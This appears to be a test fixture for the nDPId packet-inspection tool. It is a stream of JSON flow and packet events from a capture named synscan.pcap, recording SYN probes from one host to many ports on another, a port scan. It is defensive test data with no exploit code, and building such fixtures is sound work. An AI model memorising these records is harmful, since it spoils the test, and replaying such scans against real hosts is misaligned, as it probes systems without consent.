+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1120,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1111,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAs0FQAACUGUx6sEAAIQA2GNIzTJXrdU4MZAAAAAGACCAALEgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1121,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1121,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1112,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsMh0AADEG5VWsEAAIQA2GNIzTH5fdU4MZAAAAAGACCAAQ9QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1122,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1122,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1113,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsi4MAADAGjO+sEAAIQA2GNIzTG8LdU4MZAAAAAGACBAAYygAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1123,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1123,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1114,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsv9UAADsGTZ2sEAAIQA2GNIzTIqndU4MZAAAAAGACEAAF4wAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1124,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":89,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1124,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1115,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAskOIAAC4GiZCsEAAIQA2GNIzTAFndU4MZAAAAAGACDAAsMwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1125,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1125,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1116,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsGKMAACkGBtCsEAAIQA2GNIzTDfzdU4MZAAAAAGACCAAikAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1126,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2399,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1126,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1117,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsJZ0AAC4G9NWsEAAIQA2GNIzTCV\/dU4MZAAAAAGACDAAjLQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1127,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1127,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1118,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsJmMAADcG6w+sEAAIQA2GNIzTIyLdU4MZAAAAAGACEAAFagAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1119,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsp1gAADQGbRqsEAAIQA2GNIzTAyDdU4MZAAAAAGACBAAxbAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1129,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1129,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1120,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsNHwAAC4G5fasEAAIQA2GNIzTF9XdU4MZAAAAAGACDAAUtwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1130,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2170,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1121,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsqy4AADYGZ0SsEAAIQA2GNIzTCHrdU4MZAAAAAGACDAAkEgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1131,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1122,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAssb8AACcGb7OsEAAIQA2GNIzTBFjdU4MZAAAAAGACEAAkNAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1132,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1123,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsbzUAADkGoD2sEAAIQA2GNIzTAJDdU4MZAAAAAGACCAAv\/AAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1133,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1133,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1124,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsBpUAAC4GE96sEAAIQA2GNIzTDUzdU4MZAAAAAGACDAAfQAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1134,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1533,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1134,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1125,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsewcAADYGl2usEAAIQA2GNIzTBf3dU4MZAAAAAGACDAAmjwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1135,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1117,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1135,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1126,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsb+sAACUGs4esEAAIQA2GNIzTBF3dU4MZAAAAAGACCAAsLwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1136,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1136,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1127,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAseUEAADgGlzGsEAAIQA2GNIzTA\/PdU4MZAAAAAGACBAAwmQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1137,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3325,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1137,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1128,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAs8aMAAC0GKc+sEAAIQA2GNIzTDP3dU4MZAAAAAGACCAAjjwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1138,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1129,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAspQgAADgGa2qsEAAIQA2GNIzTw1HdU4MZAAAAAGACBABxOgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1139,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1130,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsnykAADoGb0msEAAIQA2GNIzTBMHdU4MZAAAAAGACDAAnywAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1140,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1062,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1140,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1131,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsYsgAADAGtaqsEAAIQA2GNIzTBCbdU4MZAAAAAGACBAAwZgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1141,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1141,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1132,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsBCoAADcGDUmsEAAIQA2GNIzTJR\/dU4MZAAAAAGACEAADbQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1142,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1142,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1133,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsqo8AACgGdeOsEAAIQA2GNIzTF27dU4MZAAAAAGACBAAdHgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1143,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1143,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1134,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsdGkAADkGmwmsEAAIQA2GNIzTIyrdU4MZAAAAAGACCAANYgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1144,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 